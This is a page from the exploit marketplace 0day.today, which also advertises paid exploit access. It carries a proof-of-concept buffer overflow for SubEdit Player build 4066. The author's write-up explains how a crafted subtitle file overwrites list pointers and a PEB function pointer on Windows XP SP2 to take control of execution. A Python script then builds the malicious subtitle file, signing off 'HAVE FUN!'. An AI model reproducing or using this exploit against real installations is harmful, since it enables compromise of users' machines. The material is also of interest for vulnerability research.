0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SubEdit Player build 4066 subtitle Buffer Overflow PoC
====================================================== SubEdit Player build 4066 subtitle Buffer Overflow PoC ====================================================== /===Subedit Player build 4066 subtitle BoF vulnerability=========| | | SubEdit Player is a very popular player and subtitles | editor in Poland. It does not perform any boundery checks | on supplied subtitles. This causes buffer overrun and | throwing access violation exception on group of instructions: | | | 005F7C1E |. 8902 MOV DWORD PTR DS:[EDX],EAX | 005F7C20 |. 8950 04 MOV DWORD PTR DS:[EAX+4],EDX | | I thought in first moment that this is heap overflow, but | why does these instructions appear in subedit module? And | why on my winxp sp2 computer this is possible? So, I think | that this program has own kind of dynamically list structure | and I am able to overwrite its pointers. | | Ok so, I am controling EAX and EDX registers. In this | situation I am able to use technique described by c0ntex | ( thx mate! ) to overwrite a pointer to RtlEnterCriticalSection | in PEB structure of ntdll. Thanks to this (after about 30 | access violations when writing - exceptions handlers throw | exceptions handlers) | I get: | | | {Access violation when executing [42424242]} | | -Tested on Windows Xp sp2 fully patched. | -Greatz to: mewo | | -Bug discovered by grzdyl | \=================================================================| POC: #!/usr/bin/python sub = "{4143}{4200}" sub += "B" * 4098 sub += "\x20\xf0\xfd\x7f" sub += "A" * 398 fd = open("thematrix.txt", "w") fd.write(sub) fd.close() print "FILE CREATED\nHAVE FUN!" # 0day.today [2024-11-16] #